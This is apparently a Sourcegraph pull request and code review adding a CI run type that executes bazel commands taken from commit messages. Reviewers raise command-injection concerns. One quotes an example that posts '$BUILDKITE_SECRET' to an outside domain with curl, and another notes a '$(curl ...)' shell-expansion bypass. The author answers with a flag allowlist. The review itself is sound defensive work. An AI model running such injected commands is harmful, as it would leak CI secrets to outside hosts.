### PR TITLE
ci: introduce a bazel-do runtype to run user given bazel commands only

### PR DESCRIPTION
**Pull request by jhchabran**
This introduces the `bazel-do` runtype, which provides a `bazel-do/[name]` branch scheme, where you can pass in the commit description a bazel command to be run. 

Diagnosing flaky tests, or simply testing something in CI can a bit cumbersome if you don't know your way around the pipeline. This PR fixes that by providing a way to set-up a build for your branch that will run a single bazel command and nothing else. 

Classic use cases can be: 

- diagnosing a flaky test
- just testing something and you want the faster builds from the CI 
- ensuring that your new code builds remotely without having to wait for the whole build. 

How to use: create a `bazel-do/my-thing` branch and put `!bazel test //something` in the last commit description. 

I plan to follow up with a `bazel ci bazel test //foobar` that will create the branch and the commit for you, as a convenience. 

Security: only Sourcegraph teammates can build this, and it only triggers on branch named `bazel-do`. 

## Test plan

Did a few manual tests in CI, they worked perfectly.

### CODE REVIEW

**Review by burmudar — APPROVED** [review]
:feels-good:

File: enterprise/dev/ci/internal/ci/pipeline.go [hunk 1]
```diff
@@ -100,6 +102,31 @@ func GeneratePipeline(c Config) (*bk.Pipeline, error) {
 	//
 	// PERF: Try to order steps such that slower steps are first.
 	switch c.RunType {
+	case runtype.BazelDo:
+		// parse the commit message, looking for the bazel command to run
+		var bzCmd string
```
Comment (burmudar) [inline enterprise/dev/ci/internal/ci/pipeline.go:107]: the minorests of nits: `bzlCmd`

**Comment by willdollman** [comment]
I haven't dived into how commands are executed by buildkite, but an immediate thought is that we're just [concating strings](https://sourcegraph.sourcegraph.com/github.com/sourcegraph/sourcegraph/-/blob/enterprise/dev/ci/internal/ci/bazel_operations.go?L40) to create a command so this might be exploitable for command injection inside buildkite. 

e.g. would something like `!bazel test && curl -X POST -d "$BUILDKITE_SECRET" http://mydomain` work?

**Review by willdollman — CHANGES_REQUESTED** [review]
.

**Comment by jhchabran** [comment]
> I haven't dived into how commands are executed by buildkite, but an immediate thought is that we're just [concating strings](https://sourcegraph.sourcegraph.com/github.com/sourcegraph/sourcegraph/-/blob/enterprise/dev/ci/internal/ci/bazel_operations.go?L40) to create a command so this might be exploitable for command injection inside buildkite.
> 
> e.g. would something like `!bazel test && curl -X POST -d "$BUILDKITE_SECRET" http://mydomain` work?

@willdollman You need to have write access on the repo to be able to get such a build evaluated. The above would work, and would curl something indeed. Still, you could patch the pipeline and get the same exact result. 

I'll put up something @willdollman to avoid having `;` or `&&` / `||` as an attempt to limit things, but we can only do so far to prevent this kind of abuse.

File: enterprise/dev/ci/internal/ci/bazel_operations_test.go [hunk 2]
```diff
@@ -0,0 +1,28 @@
+package ci
+
+import "testing"
+
+func TestVerifyBazelCommand(t *testing.T) {
```
Comment (jhchabran) [inline enterprise/dev/ci/internal/ci/bazel_operations_test.go:5]: cc @willdollman

File: enterprise/dev/ci/internal/ci/bazel_operations.go [hunk 3]
```diff
@@ -481,3 +483,56 @@ func bazelPublishFinalDockerImage(c Config, apps []string) operations.Operation
...
+
+var allowedBazelFlags = map[string]struct{}{
+	"--runs_per_test":        {},
+	"--nobuild":              {},
+	"--local_test_jobs":      {},
+	"--test_arg":             {},
+	"--nocache_test_results": {},
+	"--test_tag_filters":     {},
+	"--test_timeout":         {},
+}
```
Comment (jhchabran) [inline enterprise/dev/ci/internal/ci/bazel_operations.go:495]: cc @evict @willdollman

Comment (evict) [reply enterprise/dev/ci/internal/ci/bazel_operations.go:495]: That looks good 👍 .

Comment (jhchabran) [reply enterprise/dev/ci/internal/ci/bazel_operations.go:495]: @evict if you approve the PR, I can go through, do you mind doing it or do you wanna wait for @willdollman ?

**Comment by evict** [comment]
> > I haven't dived into how commands are executed by buildkite, but an immediate thought is that we're just [concating strings](https://sourcegraph.sourcegraph.com/github.com/sourcegraph/sourcegraph/-/blob/enterprise/dev/ci/internal/ci/bazel_operations.go?L40) to create a command so this might be exploitable for command injection inside buildkite.
> > e.g. would something like `!bazel test && curl -X POST -d "$BUILDKITE_SECRET" http://mydomain` work?
> 
> @willdollman You need to have write access on the repo (only Sourcegraph teammates) to be able to get such a build evaluated. The above would work, and would curl something indeed. Still, you could patch the pipeline and get the same exact result.
> 
> I'll put up something @willdollman to avoid having `;` or `&&` / `||` as an attempt to limit things, but we can only do so far to prevent this kind of abuse.

This is though, because we'd still have shell expansion that would be allowed i.e. `!bazel foo $(curl -v)` would still work. Does it need variable expansion?

**Review by evict — APPROVED** [review]
LGTM, thanks @jhchabran 🙏

**Review by willdollman — APPROVED** [review]
👍

**Pull request merged**